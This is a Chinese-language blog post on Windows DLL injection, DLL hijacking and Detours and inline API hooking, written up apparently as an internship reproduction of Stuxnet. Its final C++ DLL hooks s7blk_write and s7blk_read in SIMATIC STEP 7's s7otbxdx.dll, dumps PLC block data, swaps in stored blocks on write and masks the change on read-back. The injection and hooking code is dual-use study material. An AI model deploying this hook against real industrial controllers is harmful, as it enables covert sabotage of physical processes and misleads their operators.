DLL HOOK 技术与 Stuxent

最新推荐文章于 2024-05-30 12:06:49 发布
原创 最新推荐文章于 2024-05-30 12:06:49 发布 · 2.4k 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文介绍了DLL注入的基本步骤,包括OpenProcess、VirtualAllocEx、WriteProcessMemory、GetProcAddress和CreateRemoteThread等API的使用。讨论了Stuxnet如何通过DLL注入和HOOK技术劫持s7otbxdx.dll中的s7blk_write函数,以及DLL劫持和DLL注入两种主要方式。在实践中遇到的detour库问题导致转向手动编写HOOK DLL并使用DLL注入工具进行注入。

写这篇文章的时候,已经是一周后了,因为考试的原因在学校逗留了很久,4级可能又要跪了,听力听到最后竟然发现多了一题,What the kuck!

不过所幸编译原理,抄到了同学的,很happy的玩了会wow,考考古钓钓鱼,发现踏风武僧PK果断很弱,不过熊猫人囧囧的眼神还是很可爱的,平安夜前夕嗓子无故疼痛

没有和大家去唱歌,抱着2.5L的大瓶农夫山泉在电脑前一顿猛喝,默默想哥是不是得铁线虫了,世界末日都熬过来了,却要惨死在平安夜里,不禁心中泛起一丝悲凉,于是乎

把一个月前答应别人的明信片依次寄了出去,杀了杀部落小号,打了一局LOL拿了首胜,看了泰囧,洗漱完毕,觉得生无可恋躺到床上等死,灵魂正游荡于乌有之乡,忽然想起还有这么一篇博客没有写,陡然惊醒,爬起来写博客,后人写诗赞曰:垂死病中惊坐起,芙蓉帐暖写博客。


------------------------------------------我是莫名其妙的分割线---------------------------------------------------------------------------------

几个月后被问到,怎样dll注入的问题,竟然没答出个大概,这里补充一下DLL注入前面的一部分,怎样把写好的DLL注入到指定进程的地址空间。

这里大概需要几个Win API函数,

(1) 利用Windows API OpenProcess打开宿主进程

(2) 利用Windows API VirtualAllocEx函数在远程线程的VM中分配DLL完整路径宽字符所需的存储空间

(3) 利用Windows API WriteProcessMemory函数将完整路径写入该存储空间


(4) 利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址

(5)利用Windows API CreateRemoteThread启动远程线程,将LoadLibraryW的地址作为远程线程的入口函数地址,将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以另其启动指定的DLL

粘了一下别人的程序

//打开目标进程
    HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,g_Pid);

    if (!hProcess)
    {
        AfxMessageBox(TEXT("打开进程失败"));
        return;
    }
    //在目标进程申请一段内存区域 来存放DLL路径
    LPVOID pRemoteBase=VirtualAllocEx(hProcess,NULL,0x1000,MEM_COMMIT,PAGE_READWRITE);
    if (pRemoteBase==NULL)
    {
        AfxMessageBox(TEXT("申请内存区域失败"));
        return;
    }
    //在目标进程中写入DLL路径 写入的长度要+1 字符串终止符
    if (!WriteProcessMemory(hProcess,pRemoteBase,(LPTSTR)(LPCTSTR)DllPath,DllPath.GetLength()+1,NULL))
    {
        AfxMessageBox(TEXT("进程写入失败"));
        //失败就释放原先申请的内存区域 撤销内存页的提交状态
        VirtualFreeEx(hProcess,pRemoteBase,0x1000,MEM_DECOMMIT);
        return;
    }
    //得到LoadLibraryA的函数地址  因为Kernel32的加载地址在每个应用程序中都一样
    LPTHREAD_START_ROUTINE pfn=(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA");
    //创建远程线程 执行加载
    HANDLE hRemoteThread = CreateRemoteThread(hProcess,NULL,0,pfn,pRemoteBase,0,NULL);
    if (hRemoteThread==NULL)
    {
        AfxMessageBox(TEXT("创建远程线程失败"));
        //释放原先申请的内存区域 撤销内存页的提交状态
        VirtualFreeEx(hProcess,pRemoteBase,0x1000,MEM_DECOMMIT);
        return;

    }
    AfxMessageBox(TEXT("成功注入"));
    //等待线程退出
    WaitForSingleObject(hRemoteThread,-1);
    //释放原先申请的内存区域 撤销内存页的提交状态
    VirtualFreeEx(hProcess,pRemoteBase,0x1000,MEM_DECOMMIT);
    //关闭句柄
    CloseHandle(hRemoteThread);
    CloseHandle(hProcess);


 

//================================================割鸡鸡========================================================

 

言归正传,实习过程中要实现一个DLL HOOK的功能,大概是还原Stuxent攻击过程的一个小模块,目的是HOOK s7otbxdx.dll 这个动态连接库中的s7blk_write这个函数,

Stuxent在入侵过程中,会下载一个s7otbxdx.dll 劫持掉 SIMATIC STEP 7 所使用的真正的DLL,当PC机连接PLC的时候,会拦截正常指令换成恶意的代码,并且拦截了STEP 7

的系统警告,与运行状态监控,从中剔除掉危险的信息,这招极其阴毒。不过所幸的,我只需要实现读出 s7blk_write这个函数中的某些数据就可以,应该比较简单。

这是Stuxent劫持DLL的详细报告http://www.symantec.com/connect/blogs/stuxnet-1


通过伟哥给的信息和百度,大概总结了DLL HOOK的两种主要方式,DLL劫持,DLL注入。

DLL劫持的还比较简单,因为应用程序在寻找DLL是会先在本目录下寻找,再去系统目录下寻找,微软为了不让系统目录中的DLL看起来乱七八糟而采用了这种做法,

而我们只要用一个与原DLL有相同导出函数的DLL替换掉原DLL就可以实现HOOK,简单方便。关于这个DLL的导出函数,使用IDA的Hex-Rays.Decompiler插件可以把DLL

翻译成c代码,尽管有一些会不准确,或者使用AheadLib这个工具直接可以生成可以使用的DLL c代码,不过依然是代码不够准确需要修改,在原DLL有几百个导出函数时,

并不是一种可行的方法。

关于DLL劫持的结构大概如下,声明函数不需要包含参数,因为在调用前参数已经被push,直接JMP到真实函数地址即可运行,当然在DLL初始化的时候需要load原DLL

#pragma comment(linker, "/EXPORT:FuncationName=MyFuncationName,@1")
MyFuncationName(void)
{
 GetAddress("FuncationName");
 __asm JMP EAX;
}

DLL注入的方法,实现的途径也比较多,微软提供了一个小型的库detour来实现,detour的编译过程比较蛋疼,网上的教程良莠不齐,大体过程是这样,

(1) 下载Detour并安装,一路下一步
(2) 把nmake配置到PATH中,或者运行vc\bin目录下的vcvars32.bat也可以
(3) 把Microsoft Research\Detours Express 2.1\src 整个移动到 vc文件夹下
(4) 把\Microsoft Research\Detours Express 3.0下的system.mak移动到 vc 文件夹下
(5) cmd到vc目录下执行nmake,会在lib目录下生成detours.lib,使用detour这个库只需要这一个lib文件
(6) \Microsoft Research\Detours Express 3.0\sample 是一些小工具这次我们要用到withdll
(7)直接进入,sample\withdll 文件夹下 nmake,之前最好先编译setdll和syslog两个文件

程序实现就比较简单了,使用withdll /d:detour.dll main.exe 就可以看到结果,注意detour.dll中的Hook函数一定要是导出的,这样才能被withdll捕捉到

main.exe

typedef void (*func)();

int _tmain(int argc, _TCHAR* argv[])
{
HMODULE h = LoadLibrary(_T("target.dll"));
if (h == NULL) {
printf("Load target.dll failed.\n");
return 1;
}

func f = (func)GetProcAddress(h, "test");
if (f == NULL) {
printf("Load function failed.\n");
}
f();

getchar();
}

target.dll 

BOOL APIENTRY DllMain( HMODULE hModule,
DWORD  ul_reason_for_call,
LPVOID lpReserved
)
{
printf("target.dll loaded.\n");
return TRUE;
}

#ifdef _MANAGED
#pragma managed(pop)
#endif

void test() {
printf("This is test function in target module.\n");
}

detour.dll 

typedef void (*func)();
void my_test() {
printf("Func replaced in detour.dll!!\n");
}
func old = NULL;
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
{
LONG error;
(void)hinst;
(void)reserved;
    if (dwReason == DLL_PROCESS_ATTACH) { //加载
printf("detour.dll: Starting.\n"); 
fflush(stdout);
       printf("DLLs:\n");   //共调试用, 列出当前加载的模块
for (HMODULE hModule = NULL; (hModule = DetourEnumerateModules(hModule)) != NULL;) {
wchar_t szName[MAX_PATH];
GetModuleFileName(hModule, szName, sizeof(szName));
printf("  %p: %S\n", hModule, szName);
}
        PVOID f = DetourFindFunction("target.dll", "test"); //要提花的函数是target.dll中的test
if (f == NULL) {  //没找到, 直接返回
printf("func == null.\n");
return TRUE;
}
        old = (func)f; //保存旧函数
        DetourRestoreAfterWith();  //开始准备替换工作
        DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&f, my_test);  //替换!! 替换成my_test() 函数
error = DetourTransactionCommit(); //提交修改, 并检查返回值
        if (error == NO_ERROR) {
printf("detor.dll: Detoured function replaced!\n");
}
        else {
printf("detor.dll: Error detouring function: %d\n", error);
}
    }
   else if (dwReason == DLL_PROCESS_DETACH) { //程序退出的时候回复原来的函数
DetourTransactionBegin(); 
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)old, my_test);
error = DetourTransactionCommit();
fflush(stdout);
}
return TRUE;
}

关于detour的原理稍微说一下,他用到了一个很巧妙的Trampoline函数,来实现跳回原函数

具体可以看这里http://www.cnblogs.com/flying_bat/archive/2008/04/18/1159996.html

关于怎么建立一个dll的教程http://blog.csdn.net/XXKKFF/article/details/1522632


写到这里觉得胜利只是一步之遥了,但是在实际的SIMATIC STEP 7的注入以及HOOk中,detour却频繁报错,使我不得不换另外一种方法。


手动写HOOK所用的DLL,在通过DLL注入工具注入到进程中,以达到HOOK函数目的,

这里伟哥给出了一个类似的Demo

APIHook.cpp

//

#include "APIHook.h"
#pragma  comment(lib, "Wininet.lib") 

CAPIHook::CAPIHook(LPSTR pszModName, LPSTR pszFuncName, PROC pfnHook)
{
	// 生成新的执行代码
	//0xB8, 0x0F, 0x10, 0x40, 0x00, 0xFF, 0xE0
	BYTE btNewBytes[8] = { 0x0B8, 0x0, 0x0, 0x40, 0x0, 0x0FF, 0x0E0, 0 }; 
	memcpy(m_btNewBytes, btNewBytes, 8);
	*(DWORD *)(m_btNewBytes + 1) = (DWORD)pfnHook; 

	// 加载指定模块
	//m_hModule = GetModuleHandle(pszModName);
	//if(m_hModule==NULL)
	//{
		m_hModule = ::LoadLibrary(pszModName);
	//}
	if(m_hModule == NULL)
	{
		m_pfnOrig = NULL;
		return;
	}
	m_pfnOrig = ::GetProcAddress(m_hModule, pszFuncName);


	// 修改原API函数执行代码的前8个字节,使它跳向我们的函数
	if(m_pfnOrig != NULL)
	{
		DWORD dwOldProtect;
		MEMORY_BASIC_INFORMATION    mbi;
		VirtualQuery( m_pfnOrig, &mbi, sizeof(mbi) );
		VirtualProtect(m_pfnOrig, 8, PAGE_EXECUTE_READWRITE, &dwOldProtect);

		// 保存原来的执行代码
		memcpy(m_btOldBytes, m_pfnOrig, 8);
		// 写入新的执行代码
		::WriteProcessMemory(::GetCurrentProcess(), (void *)m_pfnOrig, 
						m_btNewBytes, sizeof(DWORD)*2, NULL); 
	
		VirtualProtect(m_pfnOrig, 8, mbi.Protect, 0);
	}
}

CAPIHook::~CAPIHook()
{
	Unhook();
	if(m_hModule != NULL)
		::FreeLibrary(m_hModule);
}


void CAPIHook::Rehook()
{
	// 修改原API函数执行代码的前8个字节,使它跳向我们的函数
	if(m_pfnOrig != NULL)
	{
		DWORD dwOldProtect;
		MEMORY_BASIC_INFORMATION    mbi;
		VirtualQuery( m_pfnOrig, &mbi, sizeof(mbi) );
		VirtualProtect(m_pfnOrig, 8, PAGE_EXECUTE_READWRITE, &dwOldProtect);

		// 写入新的执行代码
		::WriteProcessMemory(::GetCurrentProcess(), (void *)m_pfnOrig, 
						m_btNewBytes, sizeof(DWORD)*2, NULL); 
	
		VirtualProtect(m_pfnOrig, 8, mbi.Protect, 0);
	}
}

void CAPIHook::Unhook()
{
	if(m_pfnOrig != NULL)
	{
		DWORD dwOldProtect;
		MEMORY_BASIC_INFORMATION    mbi;
		VirtualQuery(m_pfnOrig, &mbi, sizeof(mbi));
		VirtualProtect(m_pfnOrig, 8, PAGE_EXECUTE_READWRITE, &dwOldProtect);

		// 写入原来的执行代码
		::WriteProcessMemory(::GetCurrentProcess(), (void *)m_pfnOrig, 
						m_btOldBytes, sizeof(DWORD)*2, NULL); 
	
		VirtualProtect(m_pfnOrig, 8, mbi.Protect, 0);
	}
}

APIHook.h 

//////////////////////////////////////////////////////////
// ApiHook.h

#ifndef __APIHOOK_H__
#define __APIHOOK_H__

#include <windows.h>

class CAPIHook
{
public:
	CAPIHook(LPSTR pszModName, LPSTR pszFuncName, PROC pfnHook);
	~CAPIHook();

	void Unhook();
	void Rehook();
public:
	PROC m_pfnOrig;                 // 那个函数的真正地址
protected:
	
	BYTE m_btNewBytes[8]; 
	BYTE m_btOldBytes[8];
	HMODULE m_hModule;
};

#endif // __APIHOOK_H__

只要再写一个DLL就可以了,这里注意三点,

(1) DLLMain一定要返回true,这是dll是否加载成功的标志,不然DLL会被秒卸载掉

(2) 在Hook的时候尽量使用WinAPI函数,可以减少不必要的出错

(3) 在使用ollydbg调试的时候,设置断点的行,会把对该行的修改改成中断,所以设置断点的行不会被修改。

// step7inject.cpp : Defines the entry point for the DLL application.
//

#include "stdafx.h"
#include "APIHook.h"
#include <stdlib.h>
#include <stdio.h>
#define MAXSIZE 512

void DumpData(int a7, int a8)
{
	DWORD dwOldProtect;
	MEMORY_BASIC_INFORMATION    mbi;
	VirtualQuery((PROC)a7, &mbi, sizeof(mbi));
	VirtualProtect((PROC)a7, a8, PAGE_EXECUTE_READWRITE, &dwOldProtect);
	
	BYTE data[MAXSIZE];
	char strData[MAXSIZE];
	memcpy(data,(void*)a7,a8);
	char length[10] = {0};
	//sprintf("%08x", l)
	
	DWORD nBytes;
	HANDLE hOpenFile = (HANDLE)CreateFile(LPCSTR("c:\\dumpBin.txt"), GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, NULL, NULL);
	WriteFile(hOpenFile, &a8, 4 ,&nBytes,NULL);
	WriteFile(hOpenFile, data, a8 ,&nBytes,NULL);
	CloseHandle(hOpenFile);

	hOpenFile = (HANDLE)CreateFile(LPCSTR("c:\\dumpHex.txt"), GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, NULL, NULL);
	if (hOpenFile != INVALID_HANDLE_VALUE){
		for(int i=0;i<a8;i++){
			if (data[i]<16)
				sprintf(strData,"0%x ",data[i]);
			else
				sprintf(strData,"%x ",data[i]);
			WriteFile(hOpenFile,strData, strlen(strData) ,&nBytes,NULL);
			if (i%16==0 && i!=0)
				WriteFile(hOpenFile,"\n", strlen("\n") ,&nBytes,NULL);
		}
		CloseHandle(hOpenFile);
	}
	
	VirtualProtect((PROC)a7, a8, mbi.Protect, 0);
}
/*
a[9..c] = 58 = length
a[4..5] = 02 = 序号
a[2..3] = 0C = type
a[2a..] = type description
a[50..54] = 00 00 10 00
*/
char oldData[2048] = {0};
int op;
CAPIHook * HookWrite;
typedef int ( __stdcall *my_s7blk_write)(int a1, int a2, int a3, int a4, __int16 a5, __int16 a6, int buffer, int length);
extern "C" int __stdcall s7blk_write_0(int a1, int a2, int a3, int a4, __int16 a5, __int16 a6, int a7, int a8)
{
	int ret;
	if(op == 0)
	{
		MessageBox(NULL,"DumpGo","title",MB_OK);
		DumpData(a7,a8);
		MessageBox(NULL,"DumpDone","title",MB_OK);
		HookWrite->Unhook();
		ret = ((my_s7blk_write)HookWrite->m_pfnOrig)(a1,a2,a3,a4,a5,a6,a7,a8);
		HookWrite->Rehook();
	}
	else if(op == 1)
	{
		char * data = NULL;
		DWORD nBytes;
		HANDLE hOpenFile = (HANDLE)CreateFile(LPCSTR("c:\\dumpBin.txt"), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, NULL, NULL);
		char length[10] = {0};	
		ReadFile(hOpenFile, length, 4 ,&nBytes,NULL);
		int l = ((int *)length)[0];
		data = (char *)malloc(l);
		ReadFile(hOpenFile, data, l, &nBytes,NULL);
		CloseHandle(hOpenFile);

		HookWrite->Unhook();
		if(memcmp(data, (char *)a7, 6) == 0)
		{
			memcpy(oldData, &a8, 4);
			memcpy(&oldData[4], (char *)a7, a8);
			ret = ((my_s7blk_write)HookWrite->m_pfnOrig)(a1,a2,a3,a4,a5,a6,(int)data,l);
		}
		else
			ret = ((my_s7blk_write)HookWrite->m_pfnOrig)(a1,a2,a3,a4,a5,a6,a7,a8);
		HookWrite->Rehook();
		if(data)
			delete data;
	}
	
	return ret;
}

CAPIHook * HookRead;
typedef int ( __stdcall *my_s7blk_read)(int a2, int a3, int a4, int a5, __int16 a6, __int16 a7, int offset, int length, int a10);  //(char **); (char *)((*(char*)offset))
extern "C" int __stdcall  s7blk_read_0(int a2, int a3, int a4, int a5, __int16 a6, __int16 a7, int a8, int a9, int a10)
{
	int ret;
	HookRead->Unhook();
	ret = ((my_s7blk_read)HookRead->m_pfnOrig)(a2,a3,a4,a5,a6,a7,a8,a9,a10);

	char * newdata = (char *)(((int*)a8)[0]);
	if(memcmp(&oldData[4], newdata, 6) == 0)
	{
		((int *)a8)[0] = int(&oldData[4]);
	}

	HookRead->Rehook();
	return ret;
}

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved){
	if (dwReason == DLL_PROCESS_ATTACH) {
		HookWrite = new CAPIHook("s7otbxdx.dll", "s7blk_write",(PROC)s7blk_write_0);
		HookRead = new CAPIHook("s7otbxdx.dll", "s7blk_read",(PROC)s7blk_read_0);
		op = 1;
	}
	else if (dwReason == DLL_PROCESS_DETACH) {
		if(HookWrite)
			HookWrite->Unhook();
		if(HookRead)
			HookRead->Unhook();
	}
	return true;
}
DLL HOOK手动编写的教程
http://www.programfan.com/club/showpost.asp?id=13644





Detours版HOOK 未导出的API函数CreateProcessInternalW
追逐光芒,追随内心
11-22 2006
#include <stdio.h> //#include <tchar.h> #include <windows.h> #include "detours.h" #pragma comment(lib,"detours.lib") //以下是HOOK需要的头文件 //#include <winsock2.h> //#include <MSWSock.h> //#pragma comment(lib,"ws2_32.lib") //.
摸索Detours 3:使用Detours 采用dll 方式进行Hook
小鸣的专栏
09-09 1638
1.准备工作 新建一个DLL项目,当然 依旧是要按照前面所说的配置一下包含目录和库目录。然后就可以开始了。 2.开始,注入用Dll 使用DLL进行Hook的时候,主要处理DLL_PROCESS_ATTACH和DLL_PROCESS_DETACH 这两项,在编写相应的处理代码之前,当然是要先定义和引入需要Hook的函数,和替换的函数,如下: static int (WINAPI* Ol...
进程注入(把DLL注入到进程)( 通过钩子、线程等方式)
weixin_33868027的博客
11-14 1811
后卫大师教你进程注入首先提一下,由于文章完全是我手写,所以打不了太多,请包含,由于我已经提供了源代码,所以我在这里详细讲一下理论,至于想看代码的下载代码就可以了。代码中关于注入的部分做了详细的注释。MFC界面部分的注释没有写,(毕竟太肤浅了。) 好,言归正传。 所谓DLL注入,既把一个DLL文件放到目标进程中。 下面介绍2种注入方式: 1.远程线程注入。 2...
Hook dll中导出函数,输出想要的入参或出参
liutianheng654的博客
10-30 4056
最近逆向某聊天软件协议部分,需要打印出所有报文加解密的原文,密文以及密钥。想通过hook的方式,hook导出函数的地址,然后在函数进入前输出想要的入参,函数返回时输出想要的出参。用到了dll注入的方式。参考了逆向工程核心原理的内容。可通用性还可以,分享代码如下: https://download.csdn.net/download/liutianheng654/10754049 如果想针对自己...
C/C++ HOOK 全局 API
LYSHARK
07-16 9933
全局 API Hook 用于在操作系统级别劫持和修改全局API(Application Programming Interface,应用程序编程接口)的调用。通过全局API Hook,可以截获和篡改应用程序对特定API的调用,从而实现对应用程序行为的监控、修改或增强。
dll编程导出接口的两种方法
qingzai_的专栏
04-02 4446
前言: 在vc中到处dll有两种方法: 第一种:是通过模块定义def文件,把要导出的函数接口放在里面,而def文件为链接器提供有关程序的到处,属性等方面的信息。 第二种:在函数声明中加上__declspec(dllexport); 第一种方法示例: 先构建一个名为:mousehook_dlldll项目: 在hookLoad.h种声明两个接口函数: #pragma once
hook(笔记)
weixin_46949627的博客
10-31 465
一、hook
HooK原理简析
走在成长的路上
12-18 5017
通过反汇编代码的跟进,了解Hook的工作原理(使用Detours库实现Hook
使用x86的detours库编写hook-dll
学习,思考,记录
01-08 991
#include "detours.h" #pragma comment(lib,"detours.lib") typedef HANDLE (WINAPI *HOOK_CreateFileW)(LPCWSTR lpFileName, DWORD dwDesiredAcces, DWORD dwShareMode, LPSECU
简明的Detours Hook教程
热门推荐
天外飞猪的家
12-24 1万+
tag: Hook, Detours,Windows,CreateRemoteThread,MessageBox 前言     项目开发中需要跟踪其它程序的API调用情况。但厂商又无源码提供,故只好自己动手去Trace了。     Google/Baidu了许久,也搜集了很多代码。也经过实验和测试,总结了本文供大家参考。     本文针对Windows Hook技术在编程中的应用进行讨论,
Hook技术
jinking01的专栏
09-06 4382
linux上基于C和C++的hook尝试
使用windows钩子(HOOK)实现DLL注入
new9232的博客
08-21 1万+
本文章介绍如何使用HOOK技术实现DLL注入。通过一个测试程序,记录你的任何键盘输入信息,见识到HOOK技术的强大之处。
黑客爱用的HOOK技术大揭秘!
MachineGunJoe666
09-27 3552
什么是HOOK技术? 病毒木马为何惨遭杀软拦截? 商业软件为何频遭免费破解? 系统漏洞为何能被补丁修复? 这一切的背后到底是人性的扭曲,还是道德的沦丧,尽请收看今天的专题文章:《什么是HOOK技术?》 上面是开个玩笑,言归正传,今天来聊的话题就是安全领域一个非常重要的技术HOOK技术HOOK,英文意思是“钩子” 在计算机编程中,HOOK是一种「劫持」程序原有执行流程,添加额外处理逻辑的一种技术。 按照这个定义,其实我们Python中的装饰器和Java中的注解,这种面向切面编程的手法在某种程度上来说,
黑客爱用的 HOOK 技术大揭秘
A_991128a的博客
03-06 2408
病毒木马为何惨遭杀软拦截?商业软件为何频遭免费破解?系统漏洞为何能被补丁修复?这一切的背后到底是人性的扭曲,还是道德的沦丧,敬请收看今天的专题文章:《什么是 HOOK 技术
DLL劫持及调用数据跟踪二: 利用 MS 的Detours
qffhq 点积
03-26 1344
MS 出来了Hook API的SDK:Detours, 利用dll inject技术Hook DLL注入到目标进程中,以实际API的劫持。 官方的Demo以Messagebox API为例作了说明,实际应用时根据自己的需要修改DLL文件名以及过程参数。   已知某加密狗的接口如下: long  CheckDog(); 返回狗是否存在,1存在,0或者 long  SedData(unsi
Hook技术(钩子技术
weixin_62693307的博客
11-23 1451
这里是在CPU异常的情况下,会根据知道好的函数跳转道哪里去的操作,而该转向哪里去处理这些情况的函数地址,而这些地址会存放道一张表中,让CPU进行查阅,而这里有所不同的是,CPU异常后可能跳转的次数有点多,所有会有多种表存放了跳转的函数地址,所以我们要进行修改的话必须知道每张表中的函数地址,这样我们才可以进行函数地址的修改,从而实现自己的操作。执行系统调用的时候,CPU将从用户模式切换到内核模式,进入内核后,将会根据系统调用的API编号,去找到对应的系统服务函数,实现对应API的功能。
DllHook都是什么意思?DllHook的区别解析
Rock365 记录每一刻!
04-09 2612
近期有空研究了一下DLLHOOK的一些知识,故此做下笔记。下面以add,sub两函数和Point类为例来解释DllHook的区别。 简单的说一个是勾子,一个是动态库注入,hook起到拦截的作用,dll的使用就很常见了。任何函数的运行都需要动态或静态库。 一,Dll的简单使用 使用 一个DLL,一般需要另外两个文件.H和.LIB。.H文件或.LIB文件。.H文件可用于使用.D...
DLL注入技术之消息钩子注入(HOOK简单的实现)
WLINX
10-19 5772
低头不是认输,是要看清自己的路。仰头不是骄傲,是看见自己的天空。——致自己 Hook,是Windows消息处理机制的一个平台,应用程序可以在上面设置子程序以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。简单来说,如下图所示(个人理解,如有错误请留言): 现在开始简单的编写一...
深入解读 Android Hook 技术-从原理到实践
w风雨无阻w的专栏
05-30 7418
Hook技术,源自计算机编程中的“钩子”概念,是一种在程序执行过程中动态改变程序行为的技术,是一种允许用户或开发者拦截和处理系统事件或方法调用的技术。它通过在程序执行路径中插入自定义的代码片段,从而能够实现对程序行为的拦截和修改。动态修改: Hook 技术是在程序运行时进行修改,而不是在编译时。这使得它可以灵活地应用于各种场景,而不需要修改程序源码。透明性: 使用 Hook 技术进行修改是透明的,对于程序的其他部分来说是不可见的。这有利于保持程序的整体一致性和稳定性。可扩展性。
hook
wchg21131的博客
11-27 439
1. hook的定义 hook,钩子。勾住系统的程序逻辑。 在某段SDK源码逻辑执行的过程中,通过代码手段拦截执行该逻辑,加入自己的代码逻辑。 2. 实用价值 hook是安卓面向切面(AOP)编程的基础,可以让我们在不变更原有业务的前提下,插入额外的逻辑. 这样,既保护了原有业务的完整性,又能让额外的代码逻辑不原有业务产生耦合. (想象一下,让你在一个成熟的app上面给每一个按钮添加埋点接口,不说一万个,就说成百上千个控件让你埋点,让你写一千次埋点调用,你是不是要崩溃,hook可以轻松实现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值